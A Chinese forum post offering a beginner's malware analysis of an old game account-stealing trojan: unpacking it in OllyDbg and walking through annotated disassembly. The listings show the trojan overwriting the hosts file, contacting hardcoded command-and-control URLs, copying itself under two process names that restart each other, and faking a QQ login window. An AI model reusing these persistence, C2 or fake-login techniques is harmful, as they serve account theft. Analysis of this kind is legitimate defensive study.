-
-
[原创]某游戏盗号木马粗略分析
-
2016-11-12 15:19 5068
-
http://bbs.duba.net/thread-22747123-1-1.html
最新学习木马分析,本人小试牛刀,分析难免有些失误加上程序无法联机(服务器不再维护了),还请各位大牛批评指正,这是网上找到的一个样本,拿出来给大家分享一下(我分析的是样本2)。
PS: 盗号木马是指隐秘在电脑中的一种恶意程序,跟灰鸽子不同,这是以盗号为目的并且能够伺机盗取各种需要密码的账户(游戏,应用程序等)是属于网游木马的一种。
第一部分:介绍调试需要的工具
0x1 虚拟机 WinXP SPack 3
0x2 IDA 6.1
0x3 Ollydbg
0x4 样本(见附件)。
第二部分:观察木马行为(提示:虚拟机关闭文件共享功能,重要的资料不要放在虚拟机)
NO.1 虚拟机联网同时打开一个名字叫做QQLogin.exe(名字改成他就行)的程序,
先打开打开任务管理器,
接着单机样本,发现样本文件执行一会消失了,随后多了两个进程一个是sockhelp32.exe,
另一个是scansock.exe 。
NO.2 虚拟机断网同时打开一个名字叫做QQLogin.exe(名字改成他就行)的程序,
单机样本,看到和之前一样,但是最新打开的QQLogin。exe的程序竟然被关闭了,却而代之的是一个登陆界面。(可惜木马太老了作者已经停止维护了,
所以联网情况下找不到服务器退出了,很遗憾不能跟踪到作者的邮箱了)
第三部分:脱壳
先用PEID 查一下文件加了什么壳,
上面可以看到该木马加了Upack 0.28 - 0.399 的壳。 怎么脱壳:很简单,用Od载入
00558333 E9 22F3EFFF jmp c1.0045765A;单步下面也一样 0045765A E8 21640000 call c1.0045DA80 0045765F E9 79FEFFFF jmp c1.004574DD 004574DD 6A 58 push 0x58 004574DF 68 30E14800 push c1.0048E130 004574E4 E8 D3450000 call c1.0045BABC
然后执行 插件-》Ollydump-》脱壳在当前调试的进程 点击。
由于水平有限,此次脱壳不完美,能分析就行了。
第四部分:分析(由于程序用的是同一个文件,只因在运行中判断当前进程名而执行不同的指令)
将脱壳后保存为dump1.exe的程序拖入IDA,可以看到
至于为什么会直接显示C++代码呢?有个小技巧:在某个汇编代码处按下F5就可以还原成C++代码了,IDA果然是什么神器,这样不就一目了然了,当然从这里看不出啥猫腻。
接着用Od载入我们勉强脱完壳的程序。
经过调试发现,咱们要进入程序开始原形毕露的地方,先要在
0046FD46 FF50 50 call dword ptr ds:[eax+0x50]
下个断点,单击选中要下断点的地方,按下F2,取消也是这样。
让程序运行到这里停下,F7单步进入到函数内部,
004108B0 55 push ebp 004108B1 8BEC mov ebp,esp 004108B3 83E4 F8 and esp,0xFFFFFFF8 004108B6 6A FF push -0x1 004108B8 68 BD4C4700 push dump1.00474CBD 004108BD 64:A1 00000000 mov eax,dword ptr fs:[0] 004108C3 50 push eax 004108C4 51 push ecx 004108C5 B8 80280000 mov eax,0x2880 004108CA E8 31B80400 call dump1.0045C100 004108CF A1 747A4900 mov eax,dword ptr ds:[0x497A74] 004108D4 33C4 xor eax,esp 004108D6 898424 7C280000 mov dword ptr ss:[esp+0x287C],eax 004108DD 56 push esi 004108DE 57 push edi 004108DF A1 747A4900 mov eax,dword ptr ds:[0x497A74] 004108E4 33C4 xor eax,esp 004108E6 50 push eax 004108E7 8D8424 90280000 lea eax,dword ptr ss:[esp+0x2890] 004108EE 64:A3 00000000 mov dword ptr fs:[0],eax 004108F4 8D4424 0C lea eax,dword ptr ss:[esp+0xC] 004108F8 50 push eax 004108F9 8BF9 mov edi,ecx 004108FB C74424 10 08000>mov dword ptr ss:[esp+0x10],0x8 00410903 C74424 14 FF000>mov dword ptr ss:[esp+0x14],0xFF 0041090B FF15 28604700 call dword ptr ds:[<&comctl32.InitCommonControls>; comctl32.InitCommonControlsEx 00410911 8BCF mov ecx,edi 00410913 E8 76450300 call dump1.00444E8E 00410918 6A 00 push 0x0 0041091A E8 FC550300 call dump1.00445F1B 0041091F 83C4 04 add esp,0x4 00410922 68 28E34700 push dump1.0047E328 ; UNICODE "DNF" 00410927 8BCF mov ecx,edi 00410929 E8 C05A0300 call dump1.004463EE 0041092E E8 4DCFFFFF call dump1.0040D880; 释放文件(函数内部流程见下文)
dump1.0040D880函数内部:
代码 : 0040D880 55 push ebp 0040D881 8BEC mov ebp,esp 0040D883 81EC 60020000 sub esp,0x260 0040D889 A1 747A4900 mov eax,dword ptr ds:[0x497A74] 0040D88E 33C5 xor eax,ebp 0040D890 8945 FC mov dword ptr ss:[ebp-0x4],eax 0040D893 53 push ebx 0040D894 56 push esi 0040D895 57 push edi 0040D896 8B3D F0624700 mov edi,dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA 0040D89C 68 2C010000 push 0x12C 0040D8A1 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130] 0040D8A7 50 push eax 0040D8A8 FFD7 call ed; 获取系统目录 0040D8AA 8B1D 38634700 mov ebx,dword ptr ds[<&kernel32.lstrcat>];kernel32.lstrcatA 0040D8B0 68 28DF4700 push dump1.0047DF28 ; ASCII "\dnfset.cyc" 0040D8B5 8D8D D0FEFFFF lea ecx,dword ptr ss:[ebp-0x130] 0040D8BB 51 push ecx 0040D8BC FFD3 call ebx 0040D8BE 6A 00 push 0x0 0040D8C0 6A 00 push 0x0 0040D8C2 6A 04 push 0x4 0040D8C4 6A 00 push 0x0 0040D8C6 6A 01 push 0x1 0040D8C8 68 00000080 push 0x80000000 0040D8CD 8D95 D0FEFFFF lea edx,dword ptr ss:[ebp-0x130] 0040D8D3 52 push edx 0040D8D4 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; 释放dnfset.cyc到system32目录 0040D8DA 6A 00 push 0x0 0040D8DC 6A 00 push 0x0 0040D8DE 8BF0 mov esi,eax 0040D8E0 6A 00 push 0x0 0040D8E2 56 push esi 0040D8E3 FF15 E8624700 call dword ptr ds:[<&kernel32.SetFilePointer>]; kernel32.SetFilePointer 0040D8E9 6A 00 push 0x0 0040D8EB 8D85 A0FDFFFF lea eax,dword ptr ss:[ebp-0x260] 0040D8F1 50 push eax 0040D8F2 68 6C020000 push 0x26C 0040D8F7 68 28FA4900 push dump1.0049FA28 ; ASCII "http://183.60.203.82:5566/f/w11/get.asp" 0040D8FC 56 push esi 0040D8FD FF15 E4624700 call dword ptr ds:[<&kernel32.ReadFile>]; 从http://183.60.203.82:5566/f/w11/get.asp 读取信息 0040D903 56 push esi 0040D904 8B35 20634700 mov esi,dword ptr ds:[<&kernel32.CloseHandle>]; kernel32.CloseHandle 0040D90A FFD6 call esi 0040D90C E8 2FFFFFFF call dump1.0040D840 0040D911 68 2C010000 push 0x12C 0040D916 8D8D A4FDFFFF lea ecx,dword ptr ss:[ebp-0x25C] 0040D91C 51 push ecx 0040D91D FFD7 call edi 0040D91F 68 34DF4700 push dump1.0047DF34 ; ASCII "\drivers\etc\hosts" 0040D924 8D95 A4FDFFFF lea edx,dword ptr ss:[ebp-0x25C] 0040D92A 52 push edx 0040D92B FFD3 call ebx 0040D92D 6A 00 push 0x0 0040D92F 6A 00 push 0x0 0040D931 6A 02 push 0x2 0040D933 6A 00 push 0x0 0040D935 6A 01 push 0x1 0040D937 68 00000040 push 0x40000000 0040D93C 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-0x25C] 0040D942 50 push eax 0040D943 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; 创建文件hosts于C:\WINDOWS\system32\drivers\etc目录 0040D949 50 push eax 0040D94A FFD6 call esi 0040D94C 8B4D FC mov ecx,dword ptr ss:[ebp-0x4] 0040D94F 5F pop edi 0040D950 5E pop esi 0040D951 33CD xor ecx,ebp 0040D953 5B pop ebx 0040D954 E8 0B9D0400 call dump1.00457664 0040D959 8BE5 mov esp,ebp 0040D95B 5D pop ebp 0040D95C C3 retn
分析完call dump1.0040D880继续看下去
00410933 8B35 D4624700 mov esi,dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA 00410939 68 2C010000 push 0x12C 0041093E 8D8C24 18220000 lea ecx,dword ptr ss:[esp+0x2218] 00410945 51 push ecx 00410946 6A 00 push 0x0 00410948 FFD6 call esi 0041094A 8D9424 14220000 lea edx,dword ptr ss:[esp+0x2214] 00410951 68 30E34700 push dump1.0047E330 ; ASCII "sockhelp" 00410956 52 push edx 00410957 E8 E4800400 call dump1.00458A40 ; 判断进程名是不是sockhelp32.exe? 0041095C 83C4 08 add esp,0x8 0041095F 85C0 test eax,eax 00410961 74 3A je short dump1.0041099D ; 如果是则不跳 00410963 8B35 DC624700 mov esi,dword ptr ds:[<&kernel32.CreateThread>] ; kernel32.CreateThread 00410969 6A 00 push 0x0 0041096B 6A 00 push 0x0 0041096D 6A 00 push 0x0 0041096F 68 B0E54000 push dump1.0040E5B0 00410974 6A 00 push 0x0 00410976 6A 00 push 0x0 00410978 FFD6 call esi 创建一个线程,地址40e5b0.获取主机地址 0041097A E8 71D6FFFF call dump1.0040DFF0 从网上下载文件(函数内部见下文)
继续看dump1.0040DFF0 内部是啥样
0040DFF0 55 push ebp 0040DFF1 8BEC mov ebp,esp 0040DFF3 81EC 2C090000 sub esp,0x92C 0040DFF9 A1 747A4900 mov eax,dword ptr ds:[0x497A74] 0040DFFE 33C5 xor eax,ebp 0040E000 8945 FC mov dword ptr ss:[ebp-0x4],eax 0040E003 53 push ebx 0040E004 56 push esi 0040E005 57 push edi 0040E006 68 CCDF4700 push sockhelp.0047DFCC; ASCII "http://%d.%d.%d.%d:808/GetMeInfo.aspx" 0040E00B 8DBD D8F6FFFF lea edi,dword ptr ss:[ebp-0x928] 0040E011 E8 4AF9FFFF call sockhelp.0040D960 ; 获取主机路径 http://218.85.65.150:808/GetMeInfo.aspx 0040E016 83C4 04 add esp,0x4 0040E019 50 push eax 0040E01A 8D85 00FEFFFF lea eax,dword ptr ss:[ebp-0x200] 0040E020 50 push eax 0040E021 FF15 3C634700 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA 0040E027 68 F4DF4700 push sockhelp.0047DFF4 ; ASCII "?act=2" 0040E02C 8D8D 00FEFFFF lea ecx,dword ptr ss:[ebp-0x200] 0040E032 51 push ecx 0040E033 FF15 38634700 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA 0040E039 8B1D 60664700 mov ebx,dword ptr ds:[<&wininet.Internet>; wininet.InternetCloseHandle 0040E03F 90 nop 0040E040 E8 7BFEFFFF call sockhelp.0040DEC0 ; 同样获取主机路径 0040E045 6A 00 push 0x0 0040E047 68 00000080 push 0x80000000 0040E04C 6A 00 push 0x0 0040E04E 6A 00 push 0x0 0040E050 8D95 00FEFFFF lea edx,dword ptr ss:[ebp-0x200] 0040E056 8BF0 mov esi,eax 0040E058 52 push edx 0040E059 56 push esi 0040E05A FF15 68664700 call dword ptr ds:[<&wininet.InternetOpe>; 通过http://218.85.65.150:808/GetMeInfo.aspx?act=2打开一个资源 0040E060 68 00040000 push 0x400 0040E065 8BF8 mov edi,eax 0040E067 8D85 D0F8FFFF lea eax,dword ptr ss:[ebp-0x730] 0040E06D 6A 00 push 0x0 0040E06F 50 push eax 0040E070 E8 CBD90400 call sockhelp.0045BA40 0040E075 83C4 0C add esp,0xC 0040E078 8D8D D4F6FFFF lea ecx,dword ptr ss:[ebp-0x92C] 0040E07E 51 push ecx 0040E07F 68 00040000 push 0x400 0040E084 8D95 D0F8FFFF lea edx,dword ptr ss:[ebp-0x730] 0040E08A 52 push edx 0040E08B 57 push edi 0040E08C C785 D4F6FFFF 0>mov dword ptr ss:[ebp-0x92C],0x0 0040E096 FF15 64664700 call dword ptr ds:[<&wininet.InternetRea>; 读取数据从刚才打开的资源 0040E09C 57 push edi 0040E09D FFD3 call ebx 0040E09F 56 push esi 0040E0A0 FFD3 call ebx 0040E0A2 80BD D0F8FFFF 6>cmp byte ptr ss:[ebp-0x730],0x6F 0040E0A9 75 19 jnz short sockhelp.0040E0C4 0040E0AB 80BD D1F8FFFF 6>cmp byte ptr ss:[ebp-0x72F],0x6B 0040E0B2 75 10 jnz short sockhelp.0040E0C4 0040E0B4 68 401F0000 push 0x1F40 0040E0B9 FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep 0040E0BF ^ E9 7CFFFFFF jmp sockhelp.0040E040 0040E0C4 8D85 D0F8FFFF lea eax,dword ptr ss:[ebp-0x730] 0040E0CA 68 FCDF4700 push sockhelp.0047DFFC ; UNICODE ";" 0040E0CF 50 push eax 0040E0D0 E8 6BA90400 call sockhelp.00458A40 0040E0D5 83C4 08 add esp,0x8 0040E0D8 85C0 test eax,eax 0040E0DA 75 10 jnz short sockhelp.0040E0EC 0040E0DC 68 401F0000 push 0x1F40 ; 休息8秒 0040E0E1 FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep 0040E0E7 ^ E9 54FFFFFF jmp sockhelp.0040E040 ; 跳回继续循环
分析完call dump1.0040D880继续回来
0041097F 6A 00 push 0x0 00410981 6A 00 push 0x0 00410983 6A 00 push 0x0 00410985 68 40E14000 push dump1.0040E140 0041098A 6A 00 push 0x0 0041098C 6A 00 push 0x0 0041098E FFD6 call esi 00410990 E8 0BDDFFFF call dump1.0040E6A0 00410995 6A 00 push 0x0 00410997 FF15 E0624700 call dword ptr ds:[<&kernel32.ExitProcess>] ; kernel32.ExitProcess 0041099D 8D8424 14220000 lea eax,dword ptr ss:[esp+0x2214] 004109A4 68 3CE34700 push dump1.0047E33C ; ASCII "scansock" 004109A9 50 push eax 004109AA E8 91800400 call dump1.00458A40 ; 判断进程名是不是scansock.exe? 004109AF 83C4 08 add esp,0x8 004109B2 85C0 test eax,eax 004109B4 74 05 je short dump1.004109BB; 是则不跳 004109B6 E8 65DBFFFF call dump1.0040E520 (详情看下文)
dump1.0040E520 函数内部
0040E520 55 push ebp 0040E521 8BEC mov ebp,esp 0040E523 81EC 30010000 sub esp,0x130 0040E529 A1 747A4900 mov eax,dword ptr ds:[0x497A74] 0040E52E 33C5 xor eax,ebp 0040E530 8945 FC mov dword ptr ss:[ebp-0x4],eax 0040E533 53 push ebx 0040E534 8B1D E4634700 mov ebx,dword ptr ds:[<&shell32.ShellExe>; shell32.ShellExecuteA 0040E53A 56 push esi 0040E53B 8B35 D0624700 mov esi,dword ptr ds:[<&kernel32.GetTemp>; kernel32.GetTempPathA 0040E541 57 push edi 0040E542 8B3D A0654700 mov edi,dword ptr ds:[<&user32.wsprintfA>; user32.wsprintfA 0040E548 EB 06 jmp short scansock.0040E550 0040E54A 8D9B 00000000 lea ebx,dword ptr ds:[ebx] 0040E550 68 3CE04700 push scansock.0047E03C ; UNICODE "sockhelp32.exe" 0040E555 E8 F6EEFFFF call scansock.0040D450; 创建进程快照判断有没有sockhelp32.exe 0040E55A 83C4 04 add esp,0x4 0040E55D 85C0 test eax,eax 0040E55F 75 38 jnz short scansock.0040E599; 没有则不跳 0040E561 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130] 0040E567 50 push eax 0040E568 68 2C010000 push 0x12C 0040E56D FFD6 call esi ; 获取临时文件夹 0040E56F 8D8D D0FEFFFF lea ecx,dword ptr ss:[ebp-0x130] 0040E575 51 push ecx 0040E576 8BD1 mov edx,ecx 0040E578 68 5CE04700 push scansock.0047E05C; ASCII "%s\sockhelp32.exe" 0040E57D 52 push edx 0040E57E FFD7 call edi 0040E580 83C4 0C add esp,0xC 0040E583 6A 00 push 0x0 0040E585 6A 00 push 0x0 0040E587 6A 00 push 0x0 0040E589 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130] 0040E58F 50 push eax 0040E590 68 7CDF4700 push scansock.0047DF7C ; ASCII "open" 0040E595 6A 00 push 0x0 0040E597 FFD3 call ebx ; 运行 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\sockhelp32.exe 0040E599 68 88130000 push 0x1388 0040E59E FF15 FC624700 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep 0040E5A4 ^ EB AA jmp short scansock.0040E550 ; 继续循环
004109BB 68 48E34700 push dump1.0047E348 ; UNICODE "scansock.exe" 004109C0 E8 8BCAFFFF call dump1.0040D450; 创建进程快照判断当前进程 004109C5 83C4 04 add esp,0x4 004109C8 85C0 test eax,eax 004109CA 0F85 B2000000 jnz dump1.00410A82 ; 如果是scansock.exe则跳 dump.exe 则不跳 004109D0 68 2C010000 push 0x12C 004109D5 8D8C24 48230000 lea ecx,dword ptr ss:[esp+0x2348] 004109DC 51 push ecx 004109DD 50 push eax 004109DE FFD6 call esi 004109E0 8D9424 841E0000 lea edx,dword ptr ss:[esp+0x1E84] 004109E7 52 push edx 004109E8 68 2C010000 push 0x12C 004109ED FF15 D0624700 call dword ptr ds:[<&kernel32.GetTempPathA>] ; 获取临时文件目录 004109F3 8D8424 841E0000 lea eax,dword ptr ss:[esp+0x1E84] 004109FA 50 push eax 004109FB 8D8C24 E8200000 lea ecx,dword ptr ss:[esp+0x20E8] 00410A02 51 push ecx 00410A03 FF15 3C634700 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA 00410A09 8B35 A0654700 mov esi,dword ptr ds:[<&user32.wsprintfA>] ; user32.wsprintfA 00410A0F 8D9424 E4200000 lea edx,dword ptr ss:[esp+0x20E4] 00410A16 52 push edx 00410A17 8BC2 mov eax,edx 00410A19 68 5CE04700 push dump1.0047E05C ; ASCII "%s\sockhelp32.exe" 00410A1E 50 push eax 00410A1F FFD6 call esi 00410A21 83C4 0C add esp,0xC 00410A24 8D8C24 841E0000 lea ecx,dword ptr ss:[esp+0x1E84] 00410A2B 51 push ecx 00410A2C 8BD1 mov edx,ecx 00410A2E 68 64E34700 push dump1.0047E364 ; ASCII "%s\scansock.exe" 00410A33 52 push edx 00410A34 FFD6 call esi 00410A36 8B35 A8624700 mov esi,dword ptr ds:[<&kernel32.CopyFileA>] ; kernel32.CopyFileA 00410A3C 83C4 0C add esp,0xC 00410A3F 6A 00 push 0x0 00410A41 8D8424 881E0000 lea eax,dword ptr ss:[esp+0x1E88] 00410A48 50 push eax 00410A49 8D8C24 4C230000 lea ecx,dword ptr ss:[esp+0x234C] 00410A50 51 push ecx 00410A51 FFD6 call esi ; 复制自身并改名为scansock.exe 00410A53 6A 00 push 0x0 00410A55 8D9424 E8200000 lea edx,dword ptr ss:[esp+0x20E8] 00410A5C 52 push edx 00410A5D 8D8424 4C230000 lea eax,dword ptr ss:[esp+0x234C] 00410A64 50 push eax 00410A65 FFD6 call esi ; 复制自身并改名为sockhelp32.exe 00410A67 6A 00 push 0x0 00410A69 6A 00 push 0x0 00410A6B 6A 00 push 0x0 00410A6D 8D8C24 901E0000 lea ecx,dword ptr ss:[esp+0x1E90] 00410A74 51 push ecx 00410A75 68 7CDF4700 push dump1.0047DF7C ; ASCII "open" 00410A7A 6A 00 push 0x0 00410A7C FF15 E4634700 call dword ptr ds:[<&shell32.ShellExecuteA>] ; 并运行这两个文件 00410A82 E8 49D0FFFF call dump1.0040DAD0 ; 尝试从os.buyaoda.com..c4.buyaoda.com.主机IP由于网页无效所以不能获得 并创建文件dnfhack。py到系统目录下 00410A87 8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4] 00410A8E 52 push edx 00410A8F E8 8CCBFFFF call dump1.0040D620 00410A94 83C4 04 add esp,0x4 00410A97 8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4] 00410A9E 50 push eax 00410A9F FF15 00644700 call dword ptr ds:[<&shlwapi.PathRemoveFileSpecA>; shlwapi.PathRemoveFileSpecA 00410AA5 68 74E34700 push dump1.0047E374; UNICODE "\" 00410AAA 8D8C24 B81F0000 lea ecx,dword ptr ss:[esp+0x1FB8] 00410AB1 51 push ecx 00410AB2 FF15 38634700 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA 00410AB8 8D9424 B41F0000 lea edx,dword ptr ss:[esp+0x1FB4] 00410ABF 52 push edx 00410AC0 FF15 A4624700 call dword ptr ds:[<&kernel32.SetCurrentDirector>; kernel32.SetCurrentDirectoryA 00410AC6 68 0F040000 push 0x40F 00410ACB 8D8424 78240000 lea eax,dword ptr ss:[esp+0x2478] 00410AD2 50 push eax 00410AD3 6A 00 push 0x0 00410AD5 FF15 B4624700 call dword ptr ds:[<&kernel32.GetModuleFileNameW>; kernel32.GetModuleFileNameW 00410ADB 8D8C24 74240000 lea ecx,dword ptr ss:[esp+0x2474] 00410AE2 8DB7 A4000000 lea esi,dword ptr ds:[edi+0xA4] 00410AE8 51 push ecx 00410AE9 8BCE mov ecx,esi 00410AEB E8 003BFFFF call dump1.004045F0 00410AF0 8B06 mov eax,dword ptr ds:[esi] 00410AF2 6A 5C push 0x5C 00410AF4 50 push eax 00410AF5 E8 11890400 call dump1.0045940B 00410AFA 83C4 08 add esp,0x8 00410AFD 85C0 test eax,eax 00410AFF 74 19 je short dump1.00410B1A 00410B01 2B06 sub eax,dword ptr ds:[esi] 00410B03 D1F8 sar eax,1 00410B05 8BC8 mov ecx,eax 00410B07 83F9 FF cmp ecx,-0x1 00410B0A 74 0E je short dump1.00410B1A 00410B0C 8B16 mov edx,dword ptr ds:[esi] 00410B0E 8B42 F4 mov eax,dword ptr ds:[edx-0xC] 00410B11 41 inc ecx 00410B12 2BC1 sub eax,ecx 00410B14 56 push esi 00410B15 E8 26050000 call dump1.00411040 00410B1A 8D8424 B41F0000 lea eax,dword ptr ss:[esp+0x1FB4] 00410B21 50 push eax 00410B22 8BCE mov ecx,esi 00410B24 E8 97060000 call dump1.004111C0 00410B29 E8 72040000 call dump1.00410FA0 00410B2E 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] 00410B32 51 push ecx 00410B33 E8 18090000 call dump1.00411450 00410B38 6A 00 push 0x0 00410B3A C78424 9C280000>mov dword ptr ss:[esp+0x289C],0x0 00410B45 FF15 AC624700 call dword ptr ds:[<&kernel32.RestoreLastError>] ; ntdll.RtlSetLastWin32Error 00410B4B 8D5424 14 lea edx,dword ptr ss:[esp+0x14] 00410B4F 8BCA mov ecx,edx 00410B51 8957 20 mov dword ptr ds:[edi+0x20],edx 00410B54 E8 CD0A0300 call dump1.00441626; 创建伪造的QQ登陆界面,样本被处理过所以看不清楚
赞赏
谁下载
谁下载
看原图